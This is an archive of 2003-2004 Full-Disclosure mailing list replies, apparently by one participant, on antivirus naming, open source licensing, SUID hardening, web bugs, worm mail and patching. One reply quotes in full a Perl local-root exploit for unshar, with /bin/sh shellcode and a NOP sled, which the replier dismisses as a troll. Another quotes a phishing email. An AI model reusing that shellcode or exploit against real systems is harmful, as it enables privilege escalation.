Re: [Full-Disclosure] (no subject)
> Isn't the complete lack of naming standardization in the AV industry > simply amazing? Imagine that were the case in science, particular > medicine... No shit. They should at least get together and come up with some common naming convention. They need to make some common "naming authority", it's not difficult, we do it all the time with other software and as mentioned, in all scientific disciplines. Otherwise, things become very convoluted for us in the know. This is irrelevent to the general population, but is necessary for the people who have to deal with these things. How about it "AV guys"? (I mean to be nice here...) Todd ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] (no subject)
> I can easily understand how someone unversed in the _market forces_ > pertaining to antivirus software could hold that position, and as a > theoretical solution to the problem of lack of cross-vendor naming > coordination it has often been suggested even by though who know it > would never work in the real world. > > Neat and tidy as such a solution seems, it will not, however, work. As > I explained in other of my posts in this and the related "AV Naming > Convention" thread, in general by far the largest "cost" of naming > disagreement is borne by the users in the early hours of large-scale > outbreaks. Thus, a "solution" that specifically _requires_ all vendors > to use a different name until a name is agreed (no matter what this > process it will take some _additional_ time) is, by design, an _anti- > solution_ as such a "solution", by design, ensures perfect naming > inconsistency at the time the highest cost of naming inconsistency is > borne. Vendors should not "have to" use a different name until the "real" one is detrermined, they should use whatever they want to. You know what, I don't work in the "anti-virus" field, but what you are saying is BS. There is no good reason that I can think of that the AV companies cannot rename these things after the fact. When an outbreak happens, they provide a fix and name it whatever they want. After the fact, they could rename things and their updates reflect the "proper" name. They can keep a reference to their name in the description, what's a few more characters in the signature files for every piece of malware going to matter? another 100k in a download at most? I agree that there is probably a lot of marketing pressure that may make this difficult, but there is no technical reason for it. The AV companies cannot be that lame that they cannot handle a simple name change. I mean we use databases and other things and using these "computers" that should make this easy. If thay are that lame, maybe they shouldn't be in busines. It's up to people like us that read lists like this to make them fix this silly problem, or we can ignore it. It doesn't affect me much, it just seems silly that they cannot name things consistently. > Secondly, one of the greatest impediments to ongoing (as opposed to > initial, outbreak-phase) naming inconsistency is that many vendors do > not have internal processes robust enough to easily handle renaming This is a lame excuse at best, maybe these companies need to redesign themselves, this should not be a big problem. > (And please, before replying to this message, please, please, please, > please, please read _all_ the rest of thread -- as the only person > making a significant contribution who has more than half a clue about > how all this stuff works, what may be technically feasible, and what a > great deal of customer and industry history suggests may be acceptable, > answering the same misconceptions over and over is getting tiresome...) We'll be sure to bow down to you... Todd ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re: [ANNOUNCE] Python network security tools: Pcapy, Impacket, InlineEgg
On Fri, 28 Nov 2003, Ng Pheng Siong wrote: > On Fri, Nov 28, 2003 at 12:50:06AM +0100, H?rnhammar, Ulf wrote: > > [whatever] > > That's an incorrect usage of the open source term. I quote the Open Source > > Definition ( http://www.opensource.org/docs/definition.php ): > > The term "open source" has been understood to mean "comes with source code" > long before people try to humpty-dumpty-tise it. Just like "free software" > does not necessarily mean "GPL software". > > I happen to give away some open source (comes with source code) free > software (comes with few restrictions). Personally I couldn't care less if > it is "Open Source" or "Free Software". I understand "Open Source" to mean that the source code is open for anyone to use, without restrictions on commercial use. Restrictions apply when you want to redistribute it. If something is "Open Source", I should be able to do what I want with it, as long as I don't distribute it or binaries resulting from it. The BSD license is Open Source, although you are not required to provide your derived code to the community. You do have to acknowledge them if you distribute your code/binaries though. You are free to do this, with that minor restriction. I think it's more about that fact that anyone is allowed to use the "Open Source" code for almost any purpose, but may have restrictions on redistributing it and derivations of it. We use a product, where we get the source code to it. We pay for this and are free to modify the code as we see fit, but are *not* permitted to redistribute that code. It is not "Open Source", but it is not "Closed Source" either. One reason we picked this is that we can freely modify the code for our own use, that is important to us. We can make it work with our system and can fix bugs ourselves, regardless of the vendor. So, this is something in the middle. We are free to modify and use it, but cannot share it. We get source code, which is very good and much better than getting "binary only". People who ship "source for non-commercial use" are very close to "Open Source", but that is not exactly "Open Source". This is similar to shareware, but you get the source code, much better I think. If I had a product that I didn't want to release as "Open Source", this might be a model I chose. I hope people can make money from it, they may get some "Open Source" type benefits. Todd Burroughs --- The Internet has given us unprecedented opportunity to communicate and share on a global scale without borders; fight to keep it that way. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] automated vulnerability testing
> Most of these are situations similar to the halting problem on a Turing > machine so you are unlikely to get an error free checker. But if your > checker complains about all the possible security holes, it will complain > about nearly every construct used within C programs. I'm auditing one of our daemons, written in C. I've run it through various source code checkers and that is useful, I found something that could be exploitable using this. In our environment, it is not a problem, but we'll fix it and we all learn something. These tools are useful to find obvious problems or problems that have a pattern. Now, aftter using these tools, I have to look over the code and it cannot be code that I wrote. I don't think there's a substitute for serious code review. If you want to make a better tool, please do, I'll use it and if it's good, I might help... Todd Burroughs ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] automated vulnerability testing
> Bill Royds wrote: > > If you are truly interested in security, you won't use C as the > programming > > language. Probably, the language is written in C... Ultimately it's all machine language and we can hide things in "higher level" languages but it comes down to the fact thet we end up playing with pointers and we aren't very good at it ;-) Todd Burroughs ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] flames security group start to play , yet another vuln found (rustymemory and welshboi)
This has to be a troll, I mean if I made /bin/sh SUID root and gave you
a shell, you could probably get root on my system.
You shouldn't have much on your system that is SUID root. I have no
idea why someone would even think that unshar would be set this way.
If you use SuSE, set security to "paranoid" and it does a decent job,
after that you will need to add whatever you need to the security.local
file. depending on what you use the system for.
I know I'm biting on this, but it does underscore the fact that you should
"unsuid" anything that is not really needed on your system.
I make a small partition and mount everything else "nosuid". I put
anything that needs suid or sgid on that filesystem and make symlinks
to where it should be. This makes is easy to find SUID programs,
run mount and make sure things are mounted nosuid, then look at your
"suid partition".
Todd Burroughs
---
The Internet has given us unprecedented opportunity to communicate and
share on a global scale without borders; fight to keep it that way.
On Wed, 3 Dec 2003, KF wrote:
> if you are bored download unrar.
> -KF
>
>
> rustymemory wrote:
>
> >By: flames.bluefox.net.nz
> >if unshar suid; then you w00t
> >
> >proof of concept?
> >
> >[EMAIL PROTECTED]:~$ unshar -f `perl -e 'print"A"x2000'`
> >AASegmentation fault
> >
> >[EMAIL PROTECTED]:~$ more unshar.pl
> >#!/usr/bin/perl
> >#/usr/bin/unshar local sploit.
> >#coded by welshboi (deadbeat)
> >#found by rustymemory
> >#
> >#FLAMES SECURITY GROUP
> >#Private, please dont distribute
> >#affects all linux distributions , tested on slackware 9.1 and MDK
> >###
> >[EMAIL PROTECTED] sploits]$ perl unshar.pl #
> ># #
> >#[] /usr/bin/unshar exploit #
> >#[] coded by: deadbeat [] #
> >#[] found by: rustymemory [] #
> >#_f1GWugHu[SPZ #
> ># #
> >#sh-2.05b$ #
> >###
> ># 47byte shellcode (exec /bin/sh)
> >$hell = "\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07".
> >"\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b".
> >"\x53\x50\x5a\x89\xe1\xb0\x0b\xcd\x80\xe8\xdc\xff".
> >"\xff\xff\x01\x2f\x62\x69\x6e\x2f\x73\x68\x01";
> >$egg = 2000;
> >$buf = 1128;
> >$nop = "\x90";
> >$offset = 0;
> >$ret =0x40055bdc;
> >if(@ARGV == 1) {$offset = $ARGV[0];}
> >$addr = pack('l', ($ret + $offset));
> >for($i = 0; $i<$buf; $i += 4){$evil .=$addr;}
> >for($i = 0; $i<($egg - length($hell) -100); $i++){$evil .=$nop;}
> >$evil .= $hell;
> >print "\n[] /usr/bin/unshar exploit []\n";
> >print "[] coded by: deadbeat, uk2sec []\n";
> >print "[] found by: rustymemory []\n\n";
> >print ("[]trying addr: 0x", sprintf('%lx',($ret + $offset)),"\n");
> >system("/usr/bin/unshar -f $evil");
> >
> >-
> >shouts to ?
> >
> >calidan(daddeh) , linucks ( wifi whore) , h0stile (the maniac) , and the rest
> >of flames security group. and rusty's fiancee
> >
> >___
> >Full-Disclosure - We believe in it.
> >Charter: http://lists.netsys.com/full-disclosure-charter.html
> >
> >
> >
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Partial Solution to SUID Problems
Several exploits rely on being able to create suid programs or to execute these programs (maybe installed by an old patch, etc.) I have an idea to reduce this problem. Basically, you mount everything "nosuid", except for one filesystem. This filesystem is obviously only writeable by root, it gets rid of the linking problem discussed last week. I make a small partition and mount everything else "nosuid". I put anything that needs suid or sgid on that filesystem and make symlinks to where it should be. This makes is easy to find SUID programs, run mount and make sure things are mounted nosuid, then look at your "suid partition". So, does this make sense? It seems to make it easier and more controlled when you patch or add suid binaries. I would love to see us start to use something like this on *NIX systems. Todd Burroughs --- The Internet has given us unprecedented opportunity to communicate and share on a global scale without borders; fight to keep it that way. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Partial Solution to SUID Problems
On Fri, 5 Dec 2003, Ciro wrote:
> On Thu, 4 Dec 2003, Gino Thomas wrote:
> >
> > I asked some ppl the same question, answers vary. On one hand some ppl
> > trust the suids and claim that messing up with them will open new
> > problems and that there are also many other ways to get root (kernel,
> > libc, daemons,...) on the other hand ppl agreed with me that if i don't
If, by "messing up with them", you mean "turning off the suid bit", that
cannot decrease security. If they think otherwise, they do not know
what they talk about. Any program that is suid or sgid can either do
nothing for or decrease your security. I cannot think of any possible
way that keeping suid/sgid could increase your security. There are some
exceptions if you want to give people partial root access, like 'sudo'.
I'm open to suggestions otherwise, but doubt anyone would disagree.
> The thing that screams "bad idea" or at least "inconvienient pain in the
> neck" to me is that, on the off chance that a wide-spread exploit is
> found and you have to "make world" or whatever, it puts them right back
> and you have to do it again.
I was going to mention this, it is a "bit" of a pain when you replace
something and it gets put back "where it belongs". I've broken 'su'
on our systems before when it got updated. One of our programmers was
pissed because she thought I cut her off root ;-)
Another problem that you *must* be aware of is that if you do something
like an 'rpm' update ('make world' would likely do the same), it may
update things where they are supposed to be and they won't be suid, but
you still have your vulnerable suid program that is actually suid on the
"suid partition". It'll generally break things and you'll notice though.
If the distros did this, you wouldn't have to worry about it. I find
that the convenience of being able to look at the actual suid programs
by doing "mount; ls -l /suid_stuff" outweighs this. It's annoying at
update time though...
For the most part, you shouldn't need all those suid programs anyway.
Most boxes I administer have 'su' and 'sendmail' (sgid).
On a workstation, I usually don't bother with this, but on a server I think
it helps. It *is* a pain when I update the programs I want s[ug]id, as I
have to manually fix this. It's nice that the ones that might get installed
by updates or other admins doing things will not actually be s[ug]id, unless
they put them on the "suid partition".
This does not protect you against being rooted, but I find that it does
make it easier to monitor and control. Many of the libc and other
exploits require that you run a suid program, this makes it easier to
control which ones actually work.
When you have a lot of servers and admins of various skill and security
knowlege (if you know anything about security, you know how hard it is
for people to understand even simple security), I've found this very
helpful in controlling what programs are actually s[ug]id on my servers.
The latest Linux kernel thing is nasty, I've spent the week making
kernels, rebooting and finding/fixing minor problems unrelated to
security... Security against this: don't give shell access, if you
host websites, CGI, PHP, etc. etc., keep suids away from people and fix
things fast. Our web servers get patched real quick ;-)
Todd Burroughs
---
The Internet has given us unprecedented opportunity to communicate and
share on a global scale without borders; fight to keep it that way.
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Partial Solution to SUID Problems
> please explain how a user should be able to change his password > without a setuid passwd. write access to /etc/spwd.db and pwd.db for > everybody...? On a box that has user access, you would need more things suid. I mostly administer web servers and a lot of other servers that people have no need to really interact with. They change passwords, etc. through a web application and it has nothing to do with the actual server. On a server that you have shell access, you probably really need to add 'passwd' to the 'suid partitiion'. You may need some other things, on some of our servers, I have 'ping' as well. As I said, this gives you some control and, regardless if you do this, you should have the minimum number of s[ug]id programs to make your system functional. Start with 'su' and 'sendmail' for a server, for a workstation, you'll probably need a couple to run X properly and probably some for convenience. Todd ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Partial Solution to SUID Problems
On Sat, 6 Dec 2003, Paul Szabo wrote: > Sorry, but I have a counter-example (and admit that I was bitten by it): > pt_chown (or chgpt or slvmod or whatever). Some OSs use something like > that to chown or chmod the pty they just allocated. Turning the suid bit > off prevents your pty from being owned by you so you cannot set safe > permissions, and are vulnerable to "echo badcommand > yourpty". This is a good point. I'm mostly used to web servers and other machines with no users. On the web systems, we allow wide open CGIs, etc., so it's essentailly the same as having a shell (no tty though). We have some controls in place and otherwise, have fun and we'll delete you if you're bad. I'll keep this in mind, we're planning to make a shell server for customers to play on ;-) I quite likely would have missed this, except that we're messing with the kernel and I'm not sure if we got that one... Todd ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Partial Solution to SUID Problems
> Sometimes, old and silly rules aren't just about security. > > The *real* reason for the "always su from a user account" rule isn't to stop > exploits. It's so you have an audit trail of who did what. This is exactly why I need su. We have about 20 people with root access, only about 8 or 10 that regularly change things. You need an audit trail, we all make mistakes and it's a lot easier and faster (really important on a production system) if you find out who did it and talk to them. If you only have a couple admins, direct root logins should work fine. It's still nice to know what user logged in, if that account is compromised, at least you know. With root logins, you don't know who is logging in. I agree that it doesn't add much in the way of security, but I've found that most problems are caused by the admins. I know I've done my share and I've gotten that call saying "what the f*** did you just do do ns2?". (Usually, I fix things I break before anyone notices though ;-) Also, I haven't looked at the source for su, but it *should* be a fairly simple program and therefore easier to secure. (compare to X, kernel, etc.) Todd ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Is the FBI using email Web bugs?
> Can we blow off the FUD on images embedded in HTML mails? Whenever I see > the term "Web Bug" used I know that I will have to find factual > information on the subject discussed from another source. Thank you. I was wondering what "Web Bug" was, got figuring that it was simply clicking (or automatically clicking) on a link. This is not a "bug", if you click on a link, you send certain info to that site, at the least, your IP address (or your proxys) Can we drop this now, yes, people can trace poeple who use email clients which automatically send information to a server. This is not infosec, it's about educating users aznd admins. Maybe we need another list regarding things like this. Todd Burroughs ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Is the FBI using email Web bugs?
On Thu, 8 Jan 2004, Gary E. Miller wrote: > Yo Todd! > > On Thu, 8 Jan 2004, Todd Burroughs wrote: > > > I was wondering what "Web Bug" was, got figuring that it was simply > > clicking (or automatically clicking) on a link. > > A web bug can be much more than that. When you read an HTML email or > web page your workstation can send back gobs of information aount you. I didn't explain myself. I probably shouldn't being sending this, as it is noise on the list but I can't resist... This "web bug" (fucking marketing people, that's where this name came from) thing is obvious and has existed for a while. (like since they invented the Internet...) (and don't tell me how it is different now, the concept has been there all along) As I mentioned, if you send information to a server, do not expect that that information will not be used. I said that at a *minimum*, they would get your IP address. Obviously, they will get much more. The whole situation boils down to: if you send *any* server *any* information, they can use it as they want. READ THIS MS USERS If you use mail clients that send information (I mean anything) back to a server without your express consent, DO NOT EXPECT PRIVACY. This is the way the Internet works. BTW, this is not exclusiove to MS users. I work in the hosting business, we harvest info from web logs to determine a lot of things. If I wanted to be malicious, I could easily and trivially do a lot more. I'm bitching about the length of this thread, not that someone started it, we need to be open about everything, but if it becomes useless, it needs to be moved to private email, etc. Todd ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] hello
This is an unmoderated list. Whatever you or anyone on the list (including trojan clicked on by ummm Windows user) gets sent. I think it's quite amusing, at least we haven't seen a flood of them, sort of says something about the people on the list. Todd Burroughs --- The Internet has given us unprecedented opportunity to communicate and share on a global scale without borders; fight to keep it that way. On Tue, 27 Jan 2004, Gregh wrote: > > - Original Message - > From: <[EMAIL PROTECTED]> > To: <[EMAIL PROTECTED]> > Sent: Tuesday, January 27, 2004 1:32 PM > Subject: [Full-Disclosure] hello > > > > .would there be a reason the list resends a worm like this? > Mydoom isn't exactly what I wanted. > > Just out of interest, I realise many people want to receive > viruses/worms/trojans so would this be the reason? I don't mind if that is > the case. I was surprised to see it there but not uninformed, at least. > > Greg. > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] MyDoom.b samples taken down
I think it is purely social engineering, there is nothing special about this malware, it is pretty common now. What it seems to have done different is that it made Windows users see an icon that looked like a text file, one that they have been trained to accept as "safe" I think that there's a good possibility that this is run by organized crime for spam purposes or maybe worse. I really hope that someone from Microsoft follows this list and realizes the danger of allowing this situation to go on. Users can be trained to have to save a file to disk before running it, this would remove most of this problem and people who actually use email to send executable files would get used to it pretty quickly. One can only hope... Todd Burroughs --- The Internet has given us unprecedented opportunity to communicate and share on a global scale without borders; fight to keep it that way. On Mon, 2 Feb 2004, Dowling, Gabrielle wrote: > Bill > > You make some good points, but as to your comment that "Mydoom.B was not > as successful as mMydoom.A because people had already been warned about > clicking on messages with that format. It has nothing to do with the > lethality of the virus. What makes a virus dangerous today is much less > the actual virus code (as Nick says there are very much alike), but the > social engineering of the message and the smarts about where it gets the > email addresses to propagate"... > > I don't think there's any way you can support your conjecture of the > success of A over B. I haven't checked since Friday evening, but before > then I didn't see the volume of messages received at our gateway > diminish, which pretty strongly indicates that either a) we've got the > same base infection rate as when it first hit (and therefore, systems > that got hit don't know that they got hit, and aren't aware that they > might have been hit and thus haven't been reading anything about how > they should deal with this specific message if it comes in,and therefore > are likely to click on Mydoom.B if they received it) , or b) new systems > are getting infected as soon as existing systems are getting cleaned up. > While I don't think educational efforts are fruitless (and in fact far > from it, I think the fact that they have simply been inadequate), I > don't think there's any reason to think that anyone has "learned" about > this one and thus abstains. I know quite definitively that when the > "FriendGreetings" malware was circulating a couple of years ago, we had > users continue to click on links (despite it having exactly the same > message format) as each new linked site was added, despite clear > information that was sent to them immediately upon the first site > becoming known. > > What no one here seems to be interested in how this thing got so big, so > fast, and its apparent kinship in that respect to it's Sobig predecessor > (in terms of volume, and probably also in terms of ultimate goal). It > seems an important thing for this forum to consider, yet no one has > (other than to assume that there is something special about the code, > which there is not). > > G > > > ** > This e-mail is sent by a law firm and contains information > that may be privileged and confidential. If you are not the > intended recipient, please delete the e-mail and notify us > immediately. > *** > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Has anyone seen this in their e-mail
This is the standard Symantec CarrierScan message when it finds a virus. I get lots of viruses in my email daily, there's not much point in posting ones that get caught to the list. Don't take this the wrong way, but this is just an example of the common shyte flying around the Internet today. Todd Burroughs On Mon, 8 Mar 2004, Edward W. Ray wrote: > ALERT!!! > This e-mail contained one or more infected files. > The following attachments were infected and have been repaired: > > No attachments are in this category. > > The following infected attachments were deleted: > > 1. Attach.zip: [EMAIL PROTECTED] > > You may wish to contact the sender to inform them about their infections. > > This email was scanned and cleaned by Symantec AntiVirus. > > Original message text follows > > > This e-mail was addressed to my mail server. It even looked authentic, but > since my mail server never sends me zip attachments I thought it strange. > > Please be careful when opening. The zip file contains an executable, and I > would assume it is some kind of virus or worm. > > Has anyone else seen something similar? > > Regards, > > Edward W. Ray > > -Original Message- > From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] > Sent: Thursday, March 04, 2004 12:33 AM > To: [EMAIL PROTECTED] > Subject: Email account utilization warning. > > Dear user of Mmicman.com e-mail server gateway, > > Your e-mail account will be disabled because of improper using in next > three days, if you are still wishing to use it, please, resign your > account information. > > Advanced details can be found in attached file. > > For security reasons attached file is password protected. The password is > "73531". > > Best wishes, > The Mmicman.com teamhttp://www.mmicman.com > ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Operating Systems Security, "Microsoft Security, baby steps"
Here's a good example. Yesterday, a problem was resolved with OpenSSL. This package is used in a *lot* of software (yes, including *BSD ;-). SuSE had patches out the fastest, within hours of the official release. Over the course of the day, I saw most/all of the major open source OS vendors (Linux and BSD) announce patches to this problem. I know that other major software companies use OpenSSL in their products; the "free/open source" software community responds very quickly, much faster than any commercial vendor (I noticed that Cisco released a patch). This is proof, same day fix vs. fix in a few months. Updating any OS is a pain in the ass, but all of them have flaws and need to be updated. I find that at least with the UNIX-like ones, you can go on the Net and do your updates faster than you get rooted. MS really needs to fix this, they need to make it so that mom and pop can install and do updates without getting taken over. Kudos to SuSE, keep up the good work! We're getting nervous with the Novell thing, but keep security first. One thing, we need a basic install, no X, just a base install that is secure. One thing to note, I've updated a lot of SuSE based servers and had no problem, but would rather wait a bit than have problems if the vendor didn't have the resources to test things first and the problem is supposed to be limited to a DOS (as oppposed to remote root). Todd Burroughs ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Operating Systems Security, "Microsoft Security, baby steps"
On Thu, 18 Mar 2004, Schmehl, Paul L wrote: > > Updating any OS is a pain in the ass, but all of them have > > flaws and need to be updated. I find that at least with the > > UNIX-like ones, you can go on the Net and do your updates > > faster than you get rooted. > > This is foolish thinking. Do you really think that, when a patch comes > out, *then* the hackers start working on exploits? The exploits were > being used *long* before the patch comes out. The only thing a patch > gets you is protection against *future* hack attempts against *that* > weakness. Wasn't that something that MS tried to say, the "hackers" are reverse engineering our patches? That was funny, but the sad thing is that a lot of people will believe it. What I meant is that you can most likely actually use the Internet to get patches with a fresh install before you get taken over, not that somehow UNIX-like systems make patches before the exploits are out there and being used ;-) It's quite apparent by other threads on the list that this is not generally the case with Windows. Just being patched doesn't mean that you are safe, but it's better than running well known security holes. Obviously, if you go on the Net with all services running, especially on an unpatched box, you're gonna get rooted pretty quickly. Todd Burroughs ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] viruses being sent to this list
On Tue, 23 Mar 2004, Gadi Evron wrote: > | However, the mailing list has become, in a growing trend, a means by > | which people transfer viruses, whether it is their intention or if they > | got "0wned" is irrelevant, distributing malware is illegal, and should > | be dealt with by the list owners. > > I stand by it being irresponsible, and I do believe it is illegal, > however, laws in different countries vary, so as I can not cite any > ruling at the moment, I'd rather take the "illegal" part back until I > can cite something. I think that this depends on how you view the list. I think of it as simply a distribution mechanism. We could just as easily use Usenet or something web based. I know that I am not responsible for content that is propagated via my news servers, if I was, they'd be shut down right away. If this was a moderated list, I could see the moderator being responsible, at least to some extent, on the content. As for the viruses being propagated via the list, I don't think the people who run the list are responsible, as this is simply a distribution system. I guess they could run a virus scan on mail going through the list, if that is what people want. Todd Burroughs ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] viruses being sent to this list
On Wed, 24 Mar 2004, Steve Wray wrote: > Actually, I am really glad of this thread. > > Its evidence that something between me and the list > is filtering out viruses. > > My ISP *swears* that it isn't them. I'm all for an *open* network, I want raw Internet. If my ISP starts "filtering" things for me, I'd probably switch ISPs. They can offer it to me, but I want a choice. They can default it "on", but I want a choice to turn it off. I don't use Windows but if I did, I would find a safer mail client and not click on stupid things. I like getting viruses, I have to ensure that our virus scan system works, so it's nice that I get 5 to 10 of them a day. If I see one that gets though, I know something's wrong. One problem with doing any kind of filtering is that, as a common carrier (i.e., the list owners just running a distribution system), you could become legally liable for the content because now you are inspecting it and deciding on whether or not to let it through. We host a lot of websites, we do not accept any responsibilty for nor filter content. If there is a problem, we deal with it. If we did filter or censor, we could become legally liable for content. We pay quite a bit of money to a well known company to provide virus scanning for our customers. A major reason that we pay is that as long as we make sure our system works, they would likely be liable for mistakes. I'm sure that our mail system transfers at least 100,000 "viruses" a day, probably a lot more, but we are just a common carrier, unless you've signed up for virus scanning. Gadi made a good point about spam (or the lack of it) on this list and if there was some kind of filtering going on. I have a good spam filter and am good at picking out and deleting spam before looking at it, so I don't know if the list gets spam or not. I suspect that spammers don't want to send to lists like this, as they would have to fake an address from someone on the list (it is closed) and they would draw excessive attention to themselves from a community that knows what they are doing. If I where a spammer, I would definately try to avoid lists like this. Todd Burroughs --- The Internet has given us unprecedented opportunity to communicate and share on a global scale without borders; fight to keep it that way. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re: Full-Disclosure digest, Vol 1 #1694 - 33 msgs
It *could* have been funny, but it seems that there are enough people on the list stupid enough to fall for these obvious trolls. If you must respond to them, do it off list. If you think someone may be clueless, clue them in *off the list*. Also, read the whole thing, "Expert sysadmin since 2003" should clue you in that it's either a joke or the guys an idiot. (I suspect that he's laughing at the responses...) I'm all for helping newbies and a good joke... I remember a sign in my small engines class back in highschool, it applies to everything: "CAUTION: Start brain before engaging tongue" (In this case, fingers ;-) Todd Burroughs --- The Internet has given us unprecedented opportunity to communicate and share on a global scale without borders; fight to keep it that way. On Wed, 9 Jun 2004 [EMAIL PROTECTED] wrote: > First the guy asking for the C# security scanner, and now him ... > > What a waste of our time and resources. > > > > > Message: 29 > > From: "Billy B. Bilano" <[EMAIL PROTECTED]> > > To: <[EMAIL PROTECTED]> > > Subject: Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered! > > Date: Tue, 8 Jun 2004 14:00:03 -0500 > > > > Oliver! Hello! > > > > SSL is the same port as HTTPS ? OMFG then we have a bigger problem than I > > ever imagined!! HOLY SMOKES! I am going to block port 443 right now and I > > urge ALL of you to do the same before this gets out of control! > > > > Also, Oliver, I am sure I am telling you something you don't know, but you > > have a bunch of crypto code that is more then likely a virus at the end of > > your message! In fact, you are so infected, that it seems the crypto code is > > longer then the entire message you sent! This is probably how it spreads! I > > saw a couple of other people on this thing already that had this same > > symptom. > > > > > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] MS Anti Virus?
They are planning to get into a market that gaurds against the failures in their own product. I don't like this, as it seems that they are going to be in a position to intentionally make holes that their "anti-virus" software will fix. If we had a more competitive market in this type of software there would be no market for AV software and the AV companies would be making better operating systems. Remember, Microsoft is a marketing company and they are very good at it and very powerful. Educate your friends and family. Unfortunately, there isn't much choice right now, but someone will do for Linux (or *BSD) what Apple has done. If Apple was smart, they would make an OS for PCs. Maybe they will... It's sad that we are wasting so much resources on what should be a non-problem. Todd Burroughs --- The Internet has given us unprecedented opportunity to communicate and share on a global scale without borders; fight to keep it that way. On Wed, 16 Jun 2004, Chris Cappuccio wrote: > I hate to say this, but I don't think Microsoft software could be any > worse than Symantec... > > Andre Ludwig [EMAIL PROTECTED] wrote: > > Think the mafia refers to this as a protection racket... > > > > man so much can be made of this its a techy comedy gold mine. > > > > > > "our software sucks so bad that the market for anti virus software for > > our platform is such a lucrative market that we cant stay out of it" > > > > Andre Ludwig CISSP > > > > On Wed, 16 Jun 2004 19:41:49 -0400, slacker <[EMAIL PROTECTED]> wrote: > > > > > > > > > > SEATTLE (Reuters) - Microsoft Corp. (MSFT.O: Quote, Profile, > > > > Research) is still on track to offer an anti-virus product that will > > > > compete against similar software offered by Symantec Corp. (SYMC.O: > > > > Quote, Profile, Research) and Network Associates Inc. (NET.N: Quote, > > > > Profile, Research) , the world's largest software maker said late on > > > > > > Oh yeah, what's the average delay to release on exploit patches? What makes > > > me think that they are going to be that slow on releasing AV updates? =P > > > > > > slacker > > > > > > > > > > ___ > > Full-Disclosure - We believe in it. > > Charter: http://lists.netsys.com/full-disclosure-charter.html > > -- > "When it absolutely, positively had to be there yesterday: Temporal Express" > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] M$ - so what should they do?
On Mon, 21 Jun 2004 [EMAIL PROTECTED] wrote: > > No way! Am I the only person who still uses "copy con filename.txt" to > > create scripts and such at the command line? Please tell me I'm not? > > I think the intent is that "con as a special filename in every directory" has > to go away - you'd still be able to use > > copy c:\something\con filename.txt > > (Remember, us Unix people have had to use /dev/tty and /dev/null and /dev/zero > for 3 decades, and never minded that 'tty', 'null', and 'zero' didn't exist in > every single directory) Does this really matter? On UNIX I can can use /dev/whatever in any directory and I have to have that access to make UNIX work. Not having /dev/null available in every directory breaks things, I rely on it being there... The OS controls my access, I assume Windows does the same thing. Maybe having "magic" names that don't start with '/dev' (i.e., some known prefix) is a mistake, but I think that's a minor issue. Personally, I think the design of the registry and having apps like a GUI and web browser intricately tied into the OS is a very bad design and is at the core of the problem. Another is that MS is a marketing company, so they do things to gain and keep market share. That's been discussed to no end ;-) Microsoft would come a long way, very easily, in security if they made it so that you usually run things as a user, not "root" or "Administrator". Lindows has this wrong and if it gets popular, it will have similar problems. Unfortunately for MS, if they make things harder, Linux starts to look easier... Todd ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] M$ Getting Better?
